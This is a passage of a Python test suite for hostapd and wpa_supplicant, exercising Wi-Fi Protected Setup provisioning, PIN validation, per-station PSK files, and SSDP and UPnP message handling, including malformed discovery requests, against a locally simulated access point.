raise Exception("Unexpected key_mgmt")
@remote_compatible
def test_ap_wps_new_version_sta(dev, apdev):
"""WPS compatibility with new version number on the station"""
ssid = "test-wps-ver"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("SET wps_version_number 0x43")
dev[0].request("SET wps_vendor_ext_m1 000137100100020001")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_new_version_ap(dev, apdev):
"""WPS compatibility with new version number on the AP"""
ssid = "test-wps-ver"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
logger.info("WPS provisioning step")
if "FAIL" in hapd.request("SET wps_version_number 0x43"):
raise Exception("Failed to enable test functionality")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
hapd.request("SET wps_version_number 0x20")
@remote_compatible
def test_ap_wps_check_pin(dev, apdev):
"""Verify PIN checking through control interface"""
hapd = hostapd.add_ap(apdev[0],
{ "ssid": "wps", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
for t in [ ("12345670", "12345670"),
("12345678", "FAIL-CHECKSUM"),
("12345", "FAIL"),
("123456789", "FAIL"),
("1234-5670", "12345670"),
("1234 5670", "12345670"),
("1-2.3:4 5670", "12345670") ]:
res = hapd.request("WPS_CHECK_PIN " + t[0]).rstrip('\n')
res2 = dev[0].request("WPS_CHECK_PIN " + t[0]).rstrip('\n')
if res != res2:
raise Exception("Unexpected difference in WPS_CHECK_PIN responses")
if res != t[1]:
raise Exception("Incorrect WPS_CHECK_PIN response {} (expected {})".format(res, t[1]))
if "FAIL" not in hapd.request("WPS_CHECK_PIN 12345"):
raise Exception("Unexpected WPS_CHECK_PIN success")
if "FAIL" not in hapd.request("WPS_CHECK_PIN 123456789"):
raise Exception("Unexpected WPS_CHECK_PIN success")
for i in range(0, 10):
pin = dev[0].request("WPS_PIN get")
rpin = dev[0].request("WPS_CHECK_PIN " + pin).rstrip('\n')
if pin != rpin:
raise Exception("Random PIN validation failed for " + pin)
def test_ap_wps_pin_get_failure(dev, apdev):
"""PIN generation failure"""
with fail_test(dev[0], 1,
"os_get_random;wpa_supplicant_ctrl_iface_wps_pin"):
if "FAIL" not in dev[0].request("WPS_PIN get"):
raise Exception("WPS_PIN did not report failure")
def test_ap_wps_wep_config(dev, apdev):
"""WPS 2.0 AP rejecting WEP configuration"""
ssid = "test-wps-config"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin, "wps-new-ssid-wep", "OPEN", "WEP",
"hello", no_wait=True)
ev = hapd.wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL timed out")
if "reason=2" not in ev:
raise Exception("Unexpected reason code in WPS-FAIL")
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
if "Failure Reason: WEP Prohibited" not in status:
raise Exception("Failure reason not reported correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
def test_ap_wps_wep_enroll(dev, apdev):
"""WPS 2.0 STA rejecting WEP configuration"""
ssid = "test-wps-wep"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"skip_cred_build": "1", "extra_cred": "wps-wep-cred" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL event timed out")
if "msg=12" not in ev or "reason=2 (WEP Prohibited)" not in ev:
raise Exception("Unexpected WPS-FAIL event: " + ev)
@remote_compatible
def test_ap_wps_ie_fragmentation(dev, apdev):
"""WPS AP using fragmented WPS IE"""
ssid = "test-wps-ie-fragmentation"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "1234567890abcdef1234567890abcdef",
"manufacturer": "1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef",
"model_name": "1234567890abcdef1234567890abcdef",
"model_number": "1234567890abcdef1234567890abcdef",
"serial_number": "1234567890abcdef1234567890abcdef" }
hapd = hostapd.add_ap(apdev[0], params)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
bss = dev[0].get_bss(apdev[0]['bssid'])
if "wps_device_name" not in bss or bss['wps_device_name'] != "1234567890abcdef1234567890abcdef":
logger.info("Device Name not received correctly")
logger.info(bss)
# This can fail if Probe Response frame is missed and Beacon frame was
# used to fill in the BSS entry. This can happen, e.g., during heavy
# load every now and then and is not really an error, so try to
# workaround by runnign another scan.
dev[0].scan(freq="2412", only_new=True)
bss = dev[0].get_bss(apdev[0]['bssid'])
if not bss or "wps_device_name" not in bss or bss['wps_device_name'] != "1234567890abcdef1234567890abcdef":
logger.info(bss)
raise Exception("Device Name not received correctly")
if len(re.findall("dd..0050f204", bss['ie'])) != 2:
raise Exception("Unexpected number of WPS IEs")
def get_psk(pskfile):
psks = {}
with open(pskfile, "r") as f:
lines = f.read().splitlines()
for l in lines:
if l == "# WPA PSKs":
continue
(addr,psk) = l.split(' ')
psks[addr] = psk
return psks
def test_ap_wps_per_station_psk(dev, apdev):
"""WPS PBC provisioning with per-station PSK"""
addr0 = dev[0].own_addr()
addr1 = dev[1].own_addr()
addr2 = dev[2].own_addr()
ssid = "wps"
appin = "12345670"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
try:
os.remove(pskfile)
except:
pass
hapd = None
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
logger.info("First enrollee")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
logger.info("Second enrollee")
hapd.request("WPS_PBC")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].wait_connected(timeout=30)
logger.info("External registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].wps_reg(apdev[0]['bssid'], appin)
logger.info("Verifying PSK results")
psks = get_psk(pskfile)
if addr0 not in psks:
raise Exception("No PSK recorded for sta0")
if addr1 not in psks:
raise Exception("No PSK recorded for sta1")
if addr2 not in psks:
raise Exception("No PSK recorded for sta2")
if psks[addr0] == psks[addr1]:
raise Exception("Same PSK recorded for sta0 and sta1")
if psks[addr0] == psks[addr2]:
raise Exception("Same PSK recorded for sta0 and sta2")
if psks[addr1] == psks[addr2]:
raise Exception("Same PSK recorded for sta1 and sta2")
dev[0].request("REMOVE_NETWORK all")
logger.info("Second external registrar")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
psks2 = get_psk(pskfile)
if addr0 not in psks2:
raise Exception("No PSK recorded for sta0(reg)")
if psks[addr0] == psks2[addr0]:
raise Exception("Same PSK recorded for sta0(enrollee) and sta0(reg)")
finally:
os.remove(pskfile)
if hapd:
dev[0].request("DISCONNECT")
dev[1].request("DISCONNECT")
dev[2].request("DISCONNECT")
hapd.disable()
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
dev[2].flush_scan_cache()
def test_ap_wps_per_station_psk_failure(dev, apdev):
"""WPS PBC provisioning with per-station PSK (file not writable)"""
addr0 = dev[0].p2p_dev_addr()
addr1 = dev[1].p2p_dev_addr()
addr2 = dev[2].p2p_dev_addr()
ssid = "wps"
appin = "12345670"
pskfile = "/tmp/ap_wps_per_enrollee_psk.psk_file"
try:
os.remove(pskfile)
except:
pass
hapd = None
try:
with open(pskfile, "w") as f:
f.write("# WPA PSKs\n")
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa": "2", "wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": "CCMP", "ap_pin": appin,
"wpa_psk_file": pskfile }
hapd = hostapd.add_ap(apdev[0], params)
if "FAIL" in hapd.request("SET wpa_psk_file /tmp/does/not/exists/ap_wps_per_enrollee_psk_failure.psk_file"):
raise Exception("Failed to set wpa_psk_file")
logger.info("First enrollee")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
logger.info("Second enrollee")
hapd.request("WPS_PBC")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].wait_connected(timeout=30)
logger.info("External registrar")
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].wps_reg(apdev[0]['bssid'], appin)
logger.info("Verifying PSK results")
psks = get_psk(pskfile)
if len(psks) > 0:
raise Exception("PSK recorded unexpectedly")
finally:
if hapd:
for i in range(3):
dev[i].request("DISCONNECT")
hapd.disable()
for i in range(3):
dev[i].flush_scan_cache()
os.remove(pskfile)
def test_ap_wps_pin_request_file(dev, apdev):
"""WPS PIN provisioning with configured AP"""
ssid = "wps"
pinfile = "/tmp/ap_wps_pin_request_file.log"
if os.path.exists(pinfile):
os.remove(pinfile)
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wps_pin_requests": pinfile,
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
uuid = dev[0].get_status_field("uuid")
pin = dev[0].wps_read_pin()
try:
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=15)
if ev is None:
raise Exception("PIN needed event not shown")
if uuid not in ev:
raise Exception("UUID mismatch")
dev[0].request("WPS_CANCEL")
success = False
with open(pinfile, "r") as f:
lines = f.readlines()
for l in lines:
if uuid in l:
success = True
break
if not success:
raise Exception("PIN request entry not in the log file")
finally:
try:
os.remove(pinfile)
except:
pass
def test_ap_wps_auto_setup_with_config_file(dev, apdev):
"""WPS auto-setup with configuration file"""
conffile = "/tmp/ap_wps_auto_setup_with_config_file.conf"
ifname = apdev[0]['ifname']
try:
with open(conffile, "w") as f:
f.write("driver=nl80211\n")
f.write("hw_mode=g\n")
f.write("channel=1\n")
f.write("ieee80211n=1\n")
f.write("interface=%s\n" % ifname)
f.write("ctrl_interface=/var/run/hostapd\n")
f.write("ssid=wps\n")
f.write("eap_server=1\n")
f.write("wps_state=1\n")
hapd = hostapd.add_bss(apdev[0], ifname, conffile)
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[0].wait_connected(timeout=30)
with open(conffile, "r") as f:
lines = f.read().splitlines()
vals = dict()
for l in lines:
try:
[name,value] = l.split('=', 1)
vals[name] = value
except ValueError as e:
if "# WPS configuration" in l:
pass
else:
raise Exception("Unexpected configuration line: " + l)
if vals['ieee80211n'] != '1' or vals['wps_state'] != '2' or "WPA-PSK" not in vals['wpa_key_mgmt']:
raise Exception("Incorrect configuration: " + str(vals))
finally:
try:
os.remove(conffile)
except:
pass
def test_ap_wps_pbc_timeout(dev, apdev, params):
"""wpa_supplicant PBC walk time and WPS ER SelReg timeout [long]"""
if not params['long']:
raise HwsimSkip("Skip test case with long duration due to --long not specified")
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hapd = add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
eventurl = urlparse(urls['event_sub_url'])
ctrlurl = urlparse(urls['control_url'])
url = urlparse(location)
conn = HTTPConnection(url.netloc)
class WPSERHTTPServer(StreamRequestHandler):
def handle(self):
data = self.rfile.readline().strip()
logger.debug(data)
self.wfile.write(gen_wps_event())
server = MyTCPServer(("127.0.0.1", 12345), WPSERHTTPServer)
server.timeout = 1
headers = { "callback": '<http://127.0.0.1:12345/event>',
"NT": "upnp:event",
"timeout": "Second-1234" }
conn.request("SUBSCRIBE", eventurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
sid = resp.getheader("sid")
logger.debug("Subscription SID " + sid)
msg = '''<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:SetSelectedRegistrar xmlns:u="urn:schemas-wifialliance-org:service:WFAWLANConfig:1">
<NewMessage>EEoAARAQQQABARASAAIAABBTAAIxSBBJAA4ANyoAASABBv///////xBIABA2LbR7pTpRkYj7
VFi5hrLk
</NewMessage>
</u:SetSelectedRegistrar>
</s:Body>
</s:Envelope>'''
headers = { "Content-type": 'text/xml; charset="utf-8"' }
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % "SetSelectedRegistrar"
conn.request("POST", ctrlurl.path, msg, headers)
resp = conn.getresponse()
if resp.status != 200:
raise Exception("Unexpected HTTP response: %d" % resp.status)
server.handle_request()
logger.info("Start WPS_PBC and wait for PBC walk time expiration")
if "OK" not in dev[0].request("WPS_PBC"):
raise Exception("WPS_PBC failed")
start = os.times()[4]
server.handle_request()
dev[1].request("BSS_FLUSH 0")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True,
only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
logger.debug("BSS: " + str(bss))
if '[WPS-AUTH]' not in bss['flags']:
raise Exception("WPS not indicated authorized")
server.handle_request()
wps_timeout_seen = False
while True:
hapd.dump_monitor()
dev[1].dump_monitor()
if not wps_timeout_seen:
ev = dev[0].wait_event(["WPS-TIMEOUT"], timeout=0)
if ev is not None:
logger.info("PBC timeout seen")
wps_timeout_seen = True
else:
dev[0].dump_monitor()
now = os.times()[4]
if now - start > 130:
raise Exception("Selected registration information not removed")
dev[1].request("BSS_FLUSH 0")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True,
only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
logger.debug("BSS: " + str(bss))
if '[WPS-AUTH]' not in bss['flags']:
break
server.handle_request()
server.server_close()
if wps_timeout_seen:
return
now = os.times()[4]
if now < start + 150:
dur = start + 150 - now
else:
dur = 1
logger.info("Continue waiting for PBC timeout (%d sec)" % dur)
ev = dev[0].wait_event(["WPS-TIMEOUT"], timeout=dur)
if ev is None:
raise Exception("WPS-TIMEOUT not reported")
def add_ssdp_ap(ap, ap_uuid):
ssid = "wps-ssdp"
ap_pin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo",
"friendly_name": "WPS Access Point",
"manufacturer_url": "http://www.example.com/",
"model_description": "Wireless Access Point",
"model_url": "http://www.example.com/model/",
"upc": "123456789012" }
return hostapd.add_ap(ap, params)
def ssdp_send(msg, no_recv=False):
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
if no_recv:
return None
return sock.recv(1000).decode()
def ssdp_send_msearch(st, no_recv=False):
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN: "ssdp:discover"',
'ST: ' + st,
'', ''])
return ssdp_send(msg, no_recv=no_recv)
def test_ap_wps_ssdp_msearch(dev, apdev):
"""WPS AP and SSDP M-SEARCH messages"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'Host: 239.255.255.250:1900',
'Mx: 1',
'Man: "ssdp:discover"',
'St: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
ssdp_send(msg)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'host:\t239.255.255.250:1900\t\t\t\t \t\t',
'mx: \t1\t\t ',
'man: \t \t "ssdp:discover" ',
'st: urn:schemas-wifialliance-org:device:WFADevice:1\t\t',
'', ''])
ssdp_send(msg)
ssdp_send_msearch("ssdp:all")
ssdp_send_msearch("upnp:rootdevice")
ssdp_send_msearch("uuid:" + ap_uuid)
ssdp_send_msearch("urn:schemas-wifialliance-org:service:WFAWLANConfig:1")
ssdp_send_msearch("urn:schemas-wifialliance-org:device:WFADevice:1")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST:\t239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 130',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
ssdp_send(msg, no_recv=True)
def test_ap_wps_ssdp_invalid_msearch(dev, apdev):
"""WPS AP and invalid SSDP M-SEARCH messages"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
logger.debug("Missing MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Negative MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: -1',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid MX")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX; 1',
'MAN: "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing MAN")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid MAN")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN: foo',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MX: 1',
'MAN; "ssdp:discover"',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing HOST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Missing ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Mismatching ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: uuid:16d5f8a9-4ee4-4f5e-81f9-cc6e2f47f42d',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: foo:bar',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: foobar',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid ST")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST; urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid M-SEARCH")
msg = '\r\n'.join([
'M+SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
msg = '\r\n'.join([
'M-SEARCH-* HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
logger.debug("Invalid message format")
sock.sendto(b"NOTIFY * HTTP/1.1", ("239.255.255.250", 1900))
msg = '\r'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
try:
r = sock.recv(1000)
raise Exception("Unexpected M-SEARCH response: " + r)
except socket.timeout:
pass
logger.debug("Valid M-SEARCH")
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
try:
r = sock.recv(1000)
pass
except socket.timeout:
raise Exception("No SSDP response")
def test_ap_wps_ssdp_burst(dev, apdev):
"""WPS AP and SSDP burst"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
msg = '\r\n'.join([
'M-SEARCH * HTTP/1.1',
'HOST: 239.255.255.250:1900',
'MAN: "ssdp:discover"',
'MX: 1',
'ST: urn:schemas-wifialliance-org:device:WFADevice:1',
'', ''])
socket.setdefaulttimeout(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
for i in range(0, 25):
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
resp = 0
while True:
try:
r = sock.recv(1000).decode()
if not r.startswith("HTTP/1.1 200 OK\r\n"):
raise Exception("Unexpected message: " + r)
resp += 1
except socket.timeout:
break
if resp < 20:
raise Exception("Too few SSDP responses")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
sock.bind(("127.0.0.1", 0))
for i in range(0, 25):
sock.sendto(msg.encode(), ("239.255.255.250", 1900))
while True:
try:
r = sock.recv(1000).decode()
if ap_uuid in r:
break
except socket.timeout:
raise Exception("No SSDP response")
def ssdp_get_location(uuid):
res = ssdp_send_msearch("uuid:" + uuid)
location = None
for l in res.splitlines():
if l.lower().startswith("location:"):
location = l.split(':', 1)[1].strip()
break
if location is None:
raise Exception("No UPnP location found")
return location
def upnp_get_urls(location):
if sys.version_info[0] > 2:
conn = urlopen(location)
else:
conn = urlopen(location, proxies={})
tree = ET.parse(conn)
root = tree.getroot()
urn = '{urn:schemas-upnp-org:device-1-0}'
service = root.find("./" + urn + "device/" + urn + "serviceList/" + urn + "service")
res = {}
res['scpd_url'] = urljoin(location, service.find(urn + 'SCPDURL').text)
res['control_url'] = urljoin(location,
service.find(urn + 'controlURL').text)
res['event_sub_url'] = urljoin(location,
service.find(urn + 'eventSubURL').text)
return res
def upnp_soap_action(conn, path, action, include_soap_action=True,
soap_action_override=None, newmsg=None, neweventtype=None,
neweventmac=None):
soapns = 'http://schemas.xmlsoap.org/soap/envelope/'
wpsns = 'urn:schemas-wifialliance-org:service:WFAWLANConfig:1'
ET.register_namespace('soapenv', soapns)
ET.register_namespace('wfa', wpsns)
attrib = {}
attrib['{%s}encodingStyle' % soapns] = 'http://schemas.xmlsoap.org/soap/encoding/'
root = ET.Element("{%s}Envelope" % soapns, attrib=attrib)
body = ET.SubElement(root, "{%s}Body" % soapns)
act = ET.SubElement(body, "{%s}%s" % (wpsns, action))
if newmsg:
msg = ET.SubElement(act, "NewMessage")
msg.text = base64.b64encode(newmsg.encode()).decode()
if neweventtype:
msg = ET.SubElement(act, "NewWLANEventType")
msg.text = neweventtype
if neweventmac:
msg = ET.SubElement(act, "NewWLANEventMAC")
msg.text = neweventmac
headers = { "Content-type": 'text/xml; charset="utf-8"' }
if include_soap_action:
headers["SOAPAction"] = '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#%s"' % action
elif soap_action_override:
headers["SOAPAction"] = soap_action_override
decl = b'<?xml version=\'1.0\' encoding=\'utf8\'?>\n'
conn.request("POST", path, decl + ET.tostring(root), headers)
return conn.getresponse()
def test_ap_wps_upnp(dev, apdev):
"""WPS AP and UPnP operations"""
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
add_ssdp_ap(apdev[0], ap_uuid)
location = ssdp_get_location(ap_uuid)
urls = upnp_get_urls(location)
if sys.version_info[0] > 2:
conn = urlopen(urls['scpd_url'])
else:
conn = urlopen(urls['scpd_url'], proxies={})
scpd = conn.read()
if sys.version_info[0] > 2:
try:
conn = urlopen(urljoin(location, "unknown.html"))
raise Exception("Unexpected HTTP response to GET unknown URL")
except HTTPError as e:
if e.code != 404:
raise Exception("Unexpected HTTP response to GET unknown URL")
else:
conn = urlopen(urljoin(location, "unknown.html"), proxies={})
if conn.getcode() != 404:
raise Exception("Unexpected HTTP response to GET unknown URL")
url = urlparse(location)
conn = HTTPConnection(url.netloc)
#conn.set_debuglevel(1)
headers = { "Content-type": 'text/xml; charset="utf-8"',
"SOAPAction": '"urn:schemas-wifialliance-org:service:WFAWLANConfig:1#GetDeviceInfo"' }
conn.request("POST", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 404:
raise Exception("Unexpected HTTP response: %d" % resp.status)
conn.request("UNKNOWN", "hello", "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 501:
raise Exception("Unexpected HTTP response: %d" % resp.status)
headers = { "Content-type": 'text/xml; charset="utf-8"',
"SOAPAction": '"urn:some-unknown-action#GetDeviceInfo"' }
ctrlurl = urlparse(urls['control_url'])
conn.request("POST", ctrlurl.path, "\r\n\r\n", headers)
resp = conn.getresponse()
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("GetDeviceInfo without SOAPAction header")
resp = upnp_soap_action(conn, ctrlurl.path, "GetDeviceInfo",
include_soap_action=False)
if resp.status != 401:
raise Exception("Unexpected HTTP response: %d" % resp.status)
logger.debug("GetDeviceInfo with invalid SOAPAction header")
for act in [ "foo",
